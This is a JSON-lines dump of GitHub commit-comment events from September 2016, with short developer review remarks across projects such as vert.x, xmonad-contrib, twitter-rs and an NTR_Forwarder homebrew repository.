{"id":"4504452635","type":"CommitCommentEvent","actor":{"login":"luengnat"},"repo":{"name":"eclipse/vert.x"},"payload":{"comment":{"id":18868881,"position":null,"line":null,"path":null,"commit_id":"1adf3f020e91bf4525f5b5fe0120d5e04f5c1d14","created_at":"2016-09-01T18:57:14Z","updated_at":"2016-09-01T18:57:14Z","body":"no way to test this?"}},"created_at":"2016-09-01T18:57:14Z"}
{"id":"4504452833","type":"CommitCommentEvent","actor":{"login":"YareArista"},"repo":{"name":"YareArista/31_Colaborativo"},"payload":{"comment":{"id":18868882,"position":null,"line":null,"path":null,"commit_id":"eb8f2974ea686d1e0169481fc607be8e94dbede2","created_at":"2016-09-01T18:57:17Z","updated_at":"2016-09-01T18:57:17Z","body":"Me gusta"}},"created_at":"2016-09-01T18:57:17Z"}
{"id":"4504455135","type":"CommitCommentEvent","actor":{"login":"mfonville"},"repo":{"name":"opengapps/opengapps"},"payload":{"comment":{"id":18868886,"position":null,"line":null,"path":null,"commit_id":"545e17dc83a5d89932035eaf872e551d5df3e29b","created_at":"2016-09-01T18:57:44Z","updated_at":"2016-09-01T18:57:44Z","body":"@opengapps/packagers @opengapps/developers \r\nto clean-up those hooks you can run:\r\n```\r\nrm .git/modules/sources/*/hooks/post-checkout \r\nrm .git/modules/sources/*/hooks/post-merge\r\nrm .git/modules/sources/*/hooks/post-rewrite\r\n```"}},"created_at":"2016-09-01T18:57:44Z"}
{"id":"4504456979","type":"CommitCommentEvent","actor":{"login":"Alcaro"},"repo":{"name":"libretro/libretro-prboom"},"payload":{"comment":{"id":18868892,"position":null,"line":null,"path":null,"commit_id":"d690904286f1b0645c7b62a15b4f7f81905d06d3","created_at":"2016-09-01T18:58:05Z","updated_at":"2016-09-01T18:58:05Z","body":"4600 lines longer, all the comments disappeared, extra parens and weird whitespace everywhere, and now anyone wanting to change that thing has to keep nine copies in sync.\r\n\r\nAre you sure that's an improvement?"}},"created_at":"2016-09-01T18:58:05Z"}
{"id":"4504457572","type":"CommitCommentEvent","actor":{"login":"lptr"},"repo":{"name":"gradle/gradle"},"payload":{"comment":{"id":18868893,"position":12,"line":260,"path":"subprojects/dependency-management/src/test/groovy/org/gradle/api/internal/runtimeshaded/RuntimeShadedJarCreatorTest.groovy","commit_id":"8be3c931596ded52396ec226d716ce33061c9654","created_at":"2016-09-01T18:58:12Z","updated_at":"2016-09-01T18:58:12Z","body":"@alkemist: I've removed this in 26841fe68d814dc3f01c3ad21f4139ccb39e8705 because it was breaking the commit build."}},"created_at":"2016-09-01T18:58:12Z"}
{"id":"4504459568","type":"CommitCommentEvent","actor":{"login":"danizord"},"repo":{"name":"zendframework/zend-expressive-skeleton"},"payload":{"comment":{"id":18868899,"position":12,"line":16,"path":"CHANGELOG.md","commit_id":"cb92a5761ca1726eb858c9b58deac7ec85c3a8ec","created_at":"2016-09-01T18:58:34Z","updated_at":"2016-09-01T18:58:34Z","body":"@weierophinney missing \"extensions\" sub-key here (needs to be updated in Github release description as well)"}},"created_at":"2016-09-01T18:58:34Z"}
{"id":"4504463689","type":"CommitCommentEvent","actor":{"login":"AdSchellevis"},"repo":{"name":"opnsense/core"},"payload":{"comment":{"id":18868904,"position":37,"line":191,"path":"src/etc/inc/openvpn.inc","commit_id":"74e8e203b12c42da84382075d38402f3e0b1e0ec","created_at":"2016-09-01T18:59:20Z","updated_at":"2016-09-01T18:59:20Z","body":"will do :)"}},"created_at":"2016-09-01T18:59:20Z"}
{"id":"4504466406","type":"CommitCommentEvent","actor":{"login":"erusev"},"repo":{"name":"clippings/parsedown-provider"},"payload":{"comment":{"id":18868918,"position":null,"line":null,"path":null,"commit_id":"7e062021afcd921d8b3d9aa1157cb7cb2e4275e7","created_at":"2016-09-01T18:59:53Z","updated_at":"2016-09-01T18:59:53Z","body":"Nice, thanks."}},"created_at":"2016-09-01T18:59:53Z"}
{"id":"4504470636","type":"CommitCommentEvent","actor":{"login":"f1u77y"},"repo":{"name":"xmonad/xmonad-contrib"},"payload":{"comment":{"id":18868932,"position":null,"line":null,"path":null,"commit_id":"28e9f8bce781e6511b75a1c1e35f1cea4cecfefe","created_at":"2016-09-01T19:00:40Z","updated_at":"2016-09-01T19:00:40Z","body":"@geekosaur I'm talking about inactive **sub**-layouts like arguments of `(|||)` or `PerWorkspace`. @liskin `broadcastMessage` does not send a message to both side of `(|||)` beacuse `(|||)` retranslates message only to active layout. "}},"created_at":"2016-09-01T19:00:40Z"}
{"id":"4504473742","type":"CommitCommentEvent","actor":{"login":"tkelman"},"repo":{"name":"stevengj/DecFP.jl"},"payload":{"comment":{"id":18868936,"position":4,"line":3,"path":"REQUIRE","commit_id":"3eec1a25e6fddc9dca6fe5cf6821246904a623eb","created_at":"2016-09-01T19:01:14Z","updated_at":"2016-09-01T19:01:14Z","body":"https://github.com/JuliaLang/Compat.jl/commit/3c52b4151c8e09d53cbdd4d40ce704b7c5a8c074 was first released in 0.7.18"}},"created_at":"2016-09-01T19:01:14Z"}
{"id":"4504474827","type":"CommitCommentEvent","actor":{"login":"ApacheThunder"},"repo":{"name":"DanTheMan827/NTR_Forwarder"},"payload":{"comment":{"id":18868937,"position":null,"line":null,"path":null,"commit_id":"2eab01ee66dadded6d3744caa557abb381b0f125","created_at":"2016-09-01T19:01:25Z","updated_at":"2016-09-01T19:01:25Z","body":"Yo, be sure to look at merging my latest commits. The main issue with the boot splash are resolved and the max mod audio system implemented with working boot jingle. :D\r\n\r\nit might be a bit of work to do. I added quite a bit to it for the max mod system to work. :D"}},"created_at":"2016-09-01T19:01:25Z"}
{"id":"4504482661","type":"CommitCommentEvent","actor":{"login":"dbnicholson"},"repo":{"name":"endlessm/ostree"},"payload":{"comment":{"id":18868958,"position":85,"line":2292,"path":"src/libostree/ostree-repo-commit.c","commit_id":"c33e8d48260397fb3c6e08f6e6afe2294cec50a1","created_at":"2016-09-01T19:02:52Z","updated_at":"2016-09-01T19:02:52Z","body":"Oh, thanks for finding that!"}},"created_at":"2016-09-01T19:02:52Z"}
{"id":"4504483326","type":"CommitCommentEvent","actor":{"login":"andySigler"},"repo":{"name":"OpenTrons/opentrons_sdk"},"payload":{"comment":{"id":18868964,"position":null,"line":null,"path":null,"commit_id":"8ab7cede5e9c35df9ee2c51da159cece3c175754","created_at":"2016-09-01T19:03:00Z","updated_at":"2016-09-01T19:03:00Z","body":"![unittest_meme_2](https://cloud.githubusercontent.com/assets/3085774/18180503/22b14354-7055-11e6-8110-30d608a2f7d7.jpg)"}},"created_at":"2016-09-01T19:03:00Z"}
{"id":"4504483535","type":"CommitCommentEvent","actor":{"login":"Gama11"},"repo":{"name":"vshaxe/haxe-languageserver"},"payload":{"comment":{"id":18868965,"position":105,"line":116,"path":"src/haxeLanguageServer/features/CodeLensFeature.hx","commit_id":"de80a78ea6dc386033494c6c90c5ca3cb50f20a9","created_at":"2016-09-01T19:03:03Z","updated_at":"2016-09-01T19:03:03Z","body":"Why are all of these but `implementer` plural? :)"}},"created_at":"2016-09-01T19:03:03Z"}
{"id":"4504487580","type":"CommitCommentEvent","actor":{"login":"geekosaur"},"repo":{"name":"xmonad/xmonad-contrib"},"payload":{"comment":{"id":18868976,"position":null,"line":null,"path":null,"commit_id":"28e9f8bce781e6511b75a1c1e35f1cea4cecfefe","created_at":"2016-09-01T19:03:48Z","updated_at":"2016-09-01T19:03:48Z","body":"@liskin, yes, we understand that constantly calling `XQueryTree` suits your use case, and people who want more than about 12 windows should not be supported at all because that complicates your use case."}},"created_at":"2016-09-01T19:03:48Z"}
{"id":"4504489673","type":"CommitCommentEvent","actor":{"login":"DanTheMan827"},"repo":{"name":"DanTheMan827/NTR_Forwarder"},"payload":{"comment":{"id":18868979,"position":null,"line":null,"path":null,"commit_id":"2eab01ee66dadded6d3744caa557abb381b0f125","created_at":"2016-09-01T19:04:12Z","updated_at":"2016-09-01T19:04:12Z","body":"Pretty much all of my code is in the arm9/main.cpp file so it shouldn't be that much work...\r\n\r\nAlthough, I did try a straight fork of your code but for some reason I couldn't get fatinitdefault to work (just kept freezing) until I took some code from NitroHax"}},"created_at":"2016-09-01T19:04:12Z"}
{"id":"4504489962","type":"CommitCommentEvent","actor":{"login":"Expecto"},"repo":{"name":"TrinityCore/TrinityCore"},"payload":{"comment":{"id":18868980,"position":13,"line":13,"path":"sql/updates/world/3.3.5/2016_09_01_01_world.sql","commit_id":"f5cbc17387dcd8ac5d05436d3382053e8a0ab55f","created_at":"2016-09-01T19:04:14Z","updated_at":"2016-09-01T19:04:14Z","body":"http://www.wowhead.com/npc=17269/bleeding-hollow-darkcaster#abilities:mode=normal\r\n\r\nRain of Fire current id 31598"}},"created_at":"2016-09-01T19:04:14Z"}
{"id":"4504489989","type":"CommitCommentEvent","actor":{"login":"nabijaczleweli"},"repo":{"name":"QuietMisdreavus/twitter-rs"},"payload":{"comment":{"id":18868981,"position":41,"line":337,"path":"src/tweet/structs.rs","commit_id":"4c977eddfe12a3cf78856befc14448df664d6c59","created_at":"2016-09-01T19:04:15Z","updated_at":"2016-09-01T19:04:15Z","body":"Would this syntax not apply here?\r\n```rust\r\nDraftTweet {\r\n    in_reply_to: Some(in_reply_to),\r\n    ..self\r\n}\r\n```"}},"created_at":"2016-09-01T19:04:15Z"}
{"id":"4504492305","type":"CommitCommentEvent","actor":{"login":"liskin"},"repo":{"name":"xmonad/xmonad-contrib"},"payload":{"comment":{"id":18868984,"position":null,"line":null,"path":null,"commit_id":"28e9f8bce781e6511b75a1c1e35f1cea4cecfefe","created_at":"2016-09-01T19:04:42Z","updated_at":"2016-09-01T19:04:42Z","body":"I'm not suggesting to constantly call XQueryTree, why would you think that? Calling it once per xmonad re**start** is fine I think and is exactly what I'm suggesting!"}},"created_at":"2016-09-01T19:04:42Z"}
{"id":"4504496816","type":"CommitCommentEvent","actor":{"login":"f1u77y"},"repo":{"name":"xmonad/xmonad-contrib"},"payload":{"comment":{"id":18868993,"position":null,"line":null,"path":null,"commit_id":"28e9f8bce781e6511b75a1c1e35f1cea4cecfefe","created_at":"2016-09-01T19:05:35Z","updated_at":"2016-09-01T19:05:35Z","body":"@liskin but why shouldn't **startup** function be in a **startup** hook?"}},"created_at":"2016-09-01T19:05:35Z"}
{"id":"4504497232","type":"CommitCommentEvent","actor":{"login":"procedural"},"repo":{"name":"andrewrk/zig"},"payload":{"comment":{"id":18868995,"position":null,"line":null,"path":null,"commit_id":"f18e34c2c6b7884a76d98d86b41857044dbe0f06","created_at":"2016-09-01T19:05:40Z","updated_at":"2016-09-01T19:05:40Z","body":"@andrewrk thanks, but, you know, it's not enough! :) Ideally any user should trust automatic header generation without hitting any of these TODOs. I know it'll be a lot of work but it's necessary. Until then, I won't write headers by hands if I hit one of those, leaving it to the people who use my libraries from C, since without this automation it will require manual syncing, sync as poisonous as writing header declarations in C."}},"created_at":"2016-09-01T19:05:40Z"}
{"id":"4504499048","type":"CommitCommentEvent","actor":{"login":"ApacheThunder"},"repo":{"name":"DanTheMan827/NTR_Forwarder"},"payload":{"comment":{"id":18868999,"position":null,"line":null,"path":null,"commit_id":"2eab01ee66dadded6d3744caa557abb381b0f125","created_at":"2016-09-01T19:06:01Z","updated_at":"2016-09-01T19:06:01Z","body":"You may need to leave the card reset code as you have it now or update it to match mine. It's tempermental so if a major change to arm7 code happens (there's some new FIFO modules for max mod audio arm7 in my latest version now) it may cause card reset code to stop working properly.\r\n\r\nHoping ahezard cleans the card reset code up at some point. You can just look at it wrong and it will decide to stop working on you. :P"}},"created_at":"2016-09-01T19:06:01Z"}
{"id":"4504499066","type":"CommitCommentEvent","actor":{"login":"subhashgada"},"repo":{"name":"Staples-Inc/mqe-datasource"},"payload":{"comment":{"id":18869000,"position":null,"line":null,"path":null,"commit_id":"14ef7092c23ed23e85cafe3d19f03c49bc5e1eee","created_at":"2016-09-01T19:06:01Z","updated_at":"2016-09-01T19:06:01Z","body":"Bug with this code: `` are extended to the entire query not just metric id"}},"created_at":"2016-09-01T19:06:01Z"}
{"id":"4504501056","type":"CommitCommentEvent","actor":{"login":"liskin"},"repo":{"name":"xmonad/xmonad-contrib"},"payload":{"comment":{"id":18869006,"position":null,"line":null,"path":null,"commit_id":"28e9f8bce781e6511b75a1c1e35f1cea4cecfefe","created_at":"2016-09-01T19:06:23Z","updated_at":"2016-09-01T19:06:23Z","body":"Because it's not necessary, is all. :-)"}},"created_at":"2016-09-01T19:06:23Z"}
{"id":"4504504657","type":"CommitCommentEvent","actor":{"login":"liskin"},"repo":{"name":"xmonad/xmonad-contrib"},"payload":{"comment":{"id":18869020,"position":null,"line":null,"path":null,"commit_id":"28e9f8bce781e6511b75a1c1e35f1cea4cecfefe","created_at":"2016-09-01T19:07:03Z","updated_at":"2016-09-01T19:07:03Z","body":"It's a cache, for heaven's sake. It's easy to tell an uninitialized cache from a cached empty value. No need to bother the user calling a startup hook manually for that!"}},"created_at":"2016-09-01T19:07:03Z"}
{"id":"4504504885","type":"CommitCommentEvent","actor":{"login":"Mastrogeppetto75"},"repo":{"name":"Mastrogeppetto75/playWithMerge"},"payload":{"comment":{"id":18869022,"position":null,"line":null,"path":null,"commit_id":"1f74a1676a8c41f3a34af4165bedbfc900c6fadb","created_at":"2016-09-01T19:07:07Z","updated_at":"2016-09-01T19:07:07Z","body":"😻"}},"created_at":"2016-09-01T19:07:07Z"}
{"id":"4504511069","type":"CommitCommentEvent","actor":{"login":"QuietMisdreavus"},"repo":{"name":"QuietMisdreavus/twitter-rs"},"payload":{"comment":{"id":18869037,"position":41,"line":337,"path":"src/tweet/structs.rs","commit_id":"4c977eddfe12a3cf78856befc14448df664d6c59","created_at":"2016-09-01T19:08:17Z","updated_at":"2016-09-01T19:08:17Z","body":"...huh, it would. I never even knew that syntax existed. Thanks for the tip! That makes this pattern a whole lot easier."}},"created_at":"2016-09-01T19:08:17Z"}
{"id":"4504512064","type":"CommitCommentEvent","actor":{"login":"Iamblichos"},"repo":{"name":"LoneGazebo/Community-Patch-DLL"},"payload":{"comment":{"id":18869040,"position":null,"line":null,"path":null,"commit_id":"666b26dabc7b738808b414feb3561275a4433bf8","created_at":"2016-09-01T19:08:27Z","updated_at":"2016-09-01T19:08:27Z","body":"In regards to isNativeDomain stuff just going to make a custom define for turning off or on ships firing from city/improvement plots that way we have a common DLL on that score."}},"created_at":"2016-09-01T19:08:27Z"}
{"id":"4504514420","type":"CommitCommentEvent","actor":{"login":"Der-Eddy"},"repo":{"name":"Der-Eddy/discord_bot"},"payload":{"comment":{"id":18869048,"position":null,"line":null,"path":null,"commit_id":"e5956ff8467a7c16f6c7125b39bd99fd0075b2c9","created_at":"2016-09-01T19:08:54Z","updated_at":"2016-09-01T19:08:54Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;mjI0QM6Q&#x2F;25-random-user-command-allow-mentions-only-if-you-have-metion-everyone-permissions\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> random user command allow mentions only if you have metion_everyone permissions</a>"}},"created_at":"2016-09-01T19:08:54Z"}
{"id":"4504514462","type":"CommitCommentEvent","actor":{"login":"jcfr"},"repo":{"name":"girder/girder"},"payload":{"comment":{"id":18869049,"position":247,"line":340,"path":"plugins/dicom_viewer/web_external/js/main.js","commit_id":"21366fb4a70db12cbe4b2939ce007f1967f903d9","created_at":"2016-09-01T19:08:54Z","updated_at":"2016-09-01T19:08:54Z","body":"Nice. For reference, here is the implementation https://github.com/rii-mango/Daikon/blob/e30a4b63e361bdf356f304793df5339436b6510e/src/image.js#L555-L614"}},"created_at":"2016-09-01T19:08:54Z"}
{"id":"4504515219","type":"CommitCommentEvent","actor":{"login":"nabijaczleweli"},"repo":{"name":"QuietMisdreavus/twitter-rs"},"payload":{"comment":{"id":18869051,"position":41,"line":337,"path":"src/tweet/structs.rs","commit_id":"4c977eddfe12a3cf78856befc14448df664d6c59","created_at":"2016-09-01T19:09:03Z","updated_at":"2016-09-01T19:09:03Z","body":"And it's more clear what's changed, that syntax is pretty great"}},"created_at":"2016-09-01T19:09:03Z"}
{"id":"4504516323","type":"CommitCommentEvent","actor":{"login":"DanTheMan827"},"repo":{"name":"DanTheMan827/NTR_Forwarder"},"payload":{"comment":{"id":18869052,"position":null,"line":null,"path":null,"commit_id":"2eab01ee66dadded6d3744caa557abb381b0f125","created_at":"2016-09-01T19:09:17Z","updated_at":"2016-09-01T19:09:17Z","body":"Yeah, if I take the straight arm7 code from NTR_Launcher it won't fatinit...\r\n\r\nBut if I take the NitroHax arm7 it works...\r\n\r\nCommit ab98946 shows specifically what I needed to change to make it work..."}},"created_at":"2016-09-01T19:09:17Z"}
{"id":"4504516732","type":"CommitCommentEvent","actor":{"login":"dbnicholson"},"repo":{"name":"endlessm/ostree"},"payload":{"comment":{"id":18869056,"position":85,"line":2292,"path":"src/libostree/ostree-repo-commit.c","commit_id":"c33e8d48260397fb3c6e08f6e6afe2294cec50a1","created_at":"2016-09-01T19:09:21Z","updated_at":"2016-09-01T19:09:21Z","body":"Instead of going through `GError`, I think I'll just check that `errno != ENOENT`."}},"created_at":"2016-09-01T19:09:21Z"}
{"id":"4504517011","type":"CommitCommentEvent","actor":{"login":"jcfr"},"repo":{"name":"girder/girder"},"payload":{"comment":{"id":18869058,"position":247,"line":340,"path":"plugins/dicom_viewer/web_external/js/main.js","commit_id":"21366fb4a70db12cbe4b2939ce007f1967f903d9","created_at":"2016-09-01T19:09:25Z","updated_at":"2016-09-01T19:09:25Z","body":"do you know where Daikon takes care of orientation ?"}},"created_at":"2016-09-01T19:09:25Z"}
{"id":"4504521346","type":"CommitCommentEvent","actor":{"login":"vietj"},"repo":{"name":"eclipse/vert.x"},"payload":{"comment":{"id":18869067,"position":null,"line":null,"path":null,"commit_id":"1adf3f020e91bf4525f5b5fe0120d5e04f5c1d14","created_at":"2016-09-01T19:10:12Z","updated_at":"2016-09-01T19:10:12Z","body":"no, I've been able to reproduce it with this though : https://github.com/vietj/back-pressure-test (in FrontClient.java) but was not able to come up with a test.\r\n\r\nwhen the NetSocket is paused Netty autoread is set to false, it can only be reproduced when autoread is to set false and a buffer is being delivered at the same time (or almost), which happens in the _back-pressure-test_"}},"created_at":"2016-09-01T19:10:12Z"}
{"id":"4504523031","type":"CommitCommentEvent","actor":{"login":"QuietMisdreavus"},"repo":{"name":"QuietMisdreavus/twitter-rs"},"payload":{"comment":{"id":18869069,"position":41,"line":337,"path":"src/tweet/structs.rs","commit_id":"4c977eddfe12a3cf78856befc14448df664d6c59","created_at":"2016-09-01T19:10:29Z","updated_at":"2016-09-01T19:10:29Z","body":"I'm cleaning up a lot of code with this tip right now, this is wonderful"}},"created_at":"2016-09-01T19:10:29Z"}
{"id":"4504524444","type":"CommitCommentEvent","actor":{"login":"ApacheThunder"},"repo":{"name":"DanTheMan827/NTR_Forwarder"},"payload":{"comment":{"id":18869072,"position":null,"line":null,"path":null,"commit_id":"2eab01ee66dadded6d3744caa557abb381b0f125","created_at":"2016-09-01T19:10:45Z","updated_at":"2016-09-01T19:10:45Z","body":"I've never been able to init DLDI on Gateway Blue Cart before. I'm surprised you got that to work. :package: \r\n\r\narm7 side, most of the changes to add maxmod is makefile stuff. There's like only a few lines of code you really have to add to arm7's main.c. Just double check the change doesn't bork your current DLDI/Card reset setup. :D"}},"created_at":"2016-09-01T19:10:45Z"}
{"id":"4504527117","type":"CommitCommentEvent","actor":{"login":"vietj"},"repo":{"name":"eclipse/vert.x"},"payload":{"comment":{"id":18869082,"position":null,"line":null,"path":null,"commit_id":"1adf3f020e91bf4525f5b5fe0120d5e04f5c1d14","created_at":"2016-09-01T19:11:15Z","updated_at":"2016-09-01T19:11:15Z","body":"I sent a note on _vertx-dev_, if you can create a reproducer that would be great."}},"created_at":"2016-09-01T19:11:15Z"}
{"id":"4504528738","type":"CommitCommentEvent","actor":{"login":"Rohit-L"},"repo":{"name":"Cal-CS-61A-Staff/ok"},"payload":{"comment":{"id":18869085,"position":5,"line":255,"path":"server/models.py","commit_id":"a544efb9d73eb32c686b23f87d3190951b881a2c","created_at":"2016-09-01T19:11:35Z","updated_at":"2016-09-01T19:11:35Z","body":"Thanks. Will remove this commit."}},"created_at":"2016-09-01T19:11:35Z"}
{"id":"4504531310","type":"CommitCommentEvent","actor":{"login":"philmmanjaro"},"repo":{"name":"manjaro/desktop-settings"},"payload":{"comment":{"id":18869088,"position":null,"line":null,"path":null,"commit_id":"be7181e83d8d4b23166b561747e63c85c05e9897","created_at":"2016-09-01T19:12:05Z","updated_at":"2016-09-01T19:12:05Z","body":"We will find a way to solve this matter. Manjaro 16.08 is out, so we can move to **mt-0.13.x** now to see what is there broken. If **netinstall** is broken for **i3**, then we have to fix it some day. Since we have also other profiles we may focus on them first, but keep those broken ones in mind. If **WMs** need a special treaty, we have to create one ..."}},"created_at":"2016-09-01T19:12:05Z"}
{"id":"4504538676","type":"CommitCommentEvent","actor":{"login":"quinnj"},"repo":{"name":"stevengj/DecFP.jl"},"payload":{"comment":{"id":18869108,"position":4,"line":3,"path":"REQUIRE","commit_id":"3eec1a25e6fddc9dca6fe5cf6821246904a623eb","created_at":"2016-09-01T19:13:29Z","updated_at":"2016-09-01T19:13:29Z","body":"Ah, I didn't grok how the tags were displayed on that github page. The bolded \"0.8.8\" threw me off."}},"created_at":"2016-09-01T19:13:29Z"}
{"id":"4504539385","type":"CommitCommentEvent","actor":{"login":"borshop"},"repo":{"name":"basho/riak_kv"},"payload":{"comment":{"id":18869110,"position":null,"line":null,"path":null,"commit_id":"8e0233befb48e2863dff74c4705948b3c62395ec","created_at":"2016-09-01T19:13:36Z","updated_at":"2016-09-01T19:13:36Z","body":"saw approval from nickelization\nat https://github.com/basho/riak_kv/commit/8e0233befb48e2863dff74c4705948b3c62395ec"}},"created_at":"2016-09-01T19:13:36Z"}
{"id":"4504539433","type":"CommitCommentEvent","actor":{"login":"borshop"},"repo":{"name":"basho/riak_kv"},"payload":{"comment":{"id":18869111,"position":null,"line":null,"path":null,"commit_id":"8e0233befb48e2863dff74c4705948b3c62395ec","created_at":"2016-09-01T19:13:37Z","updated_at":"2016-09-01T19:13:37Z","body":"merging basho/riak_kv/develop-2.2-job-switches = 8e0233be into borshop-integration-1459-develop-2.2-job-switches"}},"created_at":"2016-09-01T19:13:37Z"}
{"id":"4504539452","type":"CommitCommentEvent","actor":{"login":"borshop"},"repo":{"name":"basho/riak_kv"},"payload":{"comment":{"id":18869112,"position":null,"line":null,"path":null,"commit_id":"8e0233befb48e2863dff74c4705948b3c62395ec","created_at":"2016-09-01T19:13:37Z","updated_at":"2016-09-01T19:13:37Z","body":"basho/riak_kv/develop-2.2-job-switches = 8e0233be merged ok, testing candidate = 679aba47"}},"created_at":"2016-09-01T19:13:37Z"}
{"id":"4504543777","type":"CommitCommentEvent","actor":{"login":"tjarratt"},"repo":{"name":"tjgrathwell/rails5-spec-converter"},"payload":{"comment":{"id":18869120,"position":null,"line":null,"path":null,"commit_id":"e12af544f7ca420d66e226df3e2c60b3a0989ebc","created_at":"2016-09-01T19:14:25Z","updated_at":"2016-09-01T19:14:25Z","body":"YEAAAAAAAAAAAAAAAAAAAAAA\r\n🔥 🔥 🔥 🔥 🔥 🔥😎 🔥 🔥 🔥 🔥 🔥 🔥 "}},"created_at":"2016-09-01T19:14:25Z"}
{"id":"4504544083","type":"CommitCommentEvent","actor":{"login":"WikiaJenkins"},"repo":{"name":"Wikia/design-system-reference-page"},"payload":{"comment":{"id":18869121,"position":null,"line":null,"path":null,"commit_id":"a0b4e6cec3f21682f02f583a738f47be0694f917","created_at":"2016-09-01T19:14:29Z","updated_at":"2016-09-01T19:14:29Z","body":"Visual Regression Testing found a difference between new version and the baseline.\nCheck the diffs [here](http://jenkins.wikia-prod:8080/job/design-system-reference-page-pr-check/358/).\nAccept the new baseline [here](http://jenkins.wikia-prod:8080/job/design-system-reference-page-update-baseline/parambuild?branch=XW-1690)."}},"created_at":"2016-09-01T19:14:29Z"}
{"id":"4504556878","type":"CommitCommentEvent","actor":{"login":"arokem"},"repo":{"name":"nipy/dipy"},"payload":{"comment":{"id":18869154,"position":null,"line":null,"path":null,"commit_id":"b8fcf0b2ae70727495c4401da9897dd1306f56cb","created_at":"2016-09-01T19:16:58Z","updated_at":"2016-09-01T19:16:58Z","body":"No problem! That's why we do code review 😄 "}},"created_at":"2016-09-01T19:16:58Z"}
{"id":"4504558078","type":"CommitCommentEvent","actor":{"login":"dpritchett"},"repo":{"name":"memtech/memtech-elvis"},"payload":{"comment":{"id":18869157,"position":null,"line":null,"path":null,"commit_id":"df2cd9ff0eafcd00f180eaac0babfa9793594e23","created_at":"2016-09-01T19:17:13Z","updated_at":"2016-09-01T19:17:13Z","body":":fu:"}},"created_at":"2016-09-01T19:17:13Z"}
{"id":"4504560013","type":"CommitCommentEvent","actor":{"login":"ApacheThunder"},"repo":{"name":"DanTheMan827/NTR_Forwarder"},"payload":{"comment":{"id":18869161,"position":null,"line":null,"path":null,"commit_id":"2eab01ee66dadded6d3744caa557abb381b0f125","created_at":"2016-09-01T19:17:35Z","updated_at":"2016-09-01T19:17:35Z","body":"Oh forgot to mention that I took out libfat from my fork of NTR Launcher entirely since it's unused. Just make sure you don't do that on your project as I'm sure you still need that. :D"}},"created_at":"2016-09-01T19:17:35Z"}
{"id":"4504564049","type":"CommitCommentEvent","actor":{"login":"gregory38"},"repo":{"name":"PCSX2/pcsx2"},"payload":{"comment":{"id":18869170,"position":null,"line":null,"path":null,"commit_id":"d78d515acb04a3bfbf0f1dca125fbb2756cbbe9d","created_at":"2016-09-01T19:18:22Z","updated_at":"2016-09-01T19:18:22Z","body":"I pushed a new commits.\r\n* I updated the constant propagation table so it won't hit the assertion\r\n* I updated the, still commented, position of COP2. It must be the opcode 18.\r\n\r\nHopefully it will work."}},"created_at":"2016-09-01T19:18:22Z"}
{"id":"4504565306","type":"CommitCommentEvent","actor":{"login":"edzob"},"repo":{"name":"edzob/scribe-java"},"payload":{"comment":{"id":18869172,"position":null,"line":null,"path":null,"commit_id":"7a8fb7edbefd5e8cdf49d718e1d63eb0400998b5","created_at":"2016-09-01T19:18:37Z","updated_at":"2016-09-01T19:18:37Z","body":"you should try\r\nhttp://wiki.github.com/fernandezpablo85/scribe-java/getting-started\r\nthat is the master branch"}},"created_at":"2016-09-01T19:18:37Z"}
{"id":"4504566320","type":"CommitCommentEvent","actor":{"login":"IgorMinar"},"repo":{"name":"juliemr/ng2-test-seed"},"payload":{"comment":{"id":18869176,"position":21,"line":61,"path":"karma.conf.js","commit_id":"2520d46da50a17d8d58883f40a74d92516ca4e5a","created_at":"2016-09-01T19:18:49Z","updated_at":"2016-09-01T19:18:49Z","body":"@juliemr do you really want the debug output?"}},"created_at":"2016-09-01T19:18:49Z"}
{"id":"4504572500","type":"CommitCommentEvent","actor":{"login":"DanTheMan827"},"repo":{"name":"DanTheMan827/NTR_Forwarder"},"payload":{"comment":{"id":18869191,"position":null,"line":null,"path":null,"commit_id":"2eab01ee66dadded6d3744caa557abb381b0f125","created_at":"2016-09-01T19:20:02Z","updated_at":"2016-09-01T19:20:02Z","body":"Yeah, I found a GW blue cart dldi file that works but of course the version of wood on that doesn't support autorun... go figure...\r\n\r\nAlso, you may want to update your .gitignore to exclude the compiled files..."}},"created_at":"2016-09-01T19:20:02Z"}
{"id":"4504572926","type":"CommitCommentEvent","actor":{"login":"obeattie"},"repo":{"name":"monzo/linkerd"},"payload":{"comment":{"id":18869193,"position":null,"line":null,"path":null,"commit_id":"39dd9c538c300bfce6060653b8d73838de891e85","created_at":"2016-09-01T19:20:08Z","updated_at":"2016-09-01T19:20:08Z","body":"@adleong Yep, it does reconnect with this fix in my tests.\r\n\r\nI _think_ this is because `AsyncStream.fromOption` [treats an empty option as an empty stream](https://github.com/twitter/util/blob/develop/util-core/src/main/scala/com/twitter/concurrent/AsyncStream.scala#L681), so it will terminate the recursive reads and move onto the concatenated reconnect logic."}},"created_at":"2016-09-01T19:20:08Z"}
{"id":"4504573005","type":"CommitCommentEvent","actor":{"login":"eblount"},"repo":{"name":"laravel/framework"},"payload":{"comment":{"id":18869194,"position":null,"line":null,"path":null,"commit_id":"51f7f695d384f8537b338f134376648849823833","created_at":"2016-09-01T19:20:10Z","updated_at":"2016-09-01T19:20:10Z","body":"All right, thanks. Migrating to exceptions. Thanks for the info, though I do wish this change would have been noted somewhere."}},"created_at":"2016-09-01T19:20:10Z"}
{"id":"4504575078","type":"CommitCommentEvent","actor":{"login":"kesienaAkp"},"repo":{"name":"andela-kndungu/document-ms-frontend"},"payload":{"comment":{"id":18869195,"position":null,"line":null,"path":null,"commit_id":"722411644b05c9628c8c6c62c5730d5334a09232","created_at":"2016-09-01T19:20:33Z","updated_at":"2016-09-01T19:20:33Z","body":":eyeglasses: "}},"created_at":"2016-09-01T19:20:33Z"}
{"id":"4504575849","type":"CommitCommentEvent","actor":{"login":"fogleman"},"repo":{"name":"girder/girder"},"payload":{"comment":{"id":18869197,"position":247,"line":340,"path":"plugins/dicom_viewer/web_external/js/main.js","commit_id":"21366fb4a70db12cbe4b2939ce007f1967f903d9","created_at":"2016-09-01T19:20:42Z","updated_at":"2016-09-01T19:20:42Z","body":"Perhaps I should re-introduce that code using this function:\r\n\r\nhttps://github.com/rii-mango/Daikon/blob/e30a4b63e361bdf356f304793df5339436b6510e/src/image.js#L783"}},"created_at":"2016-09-01T19:20:42Z"}
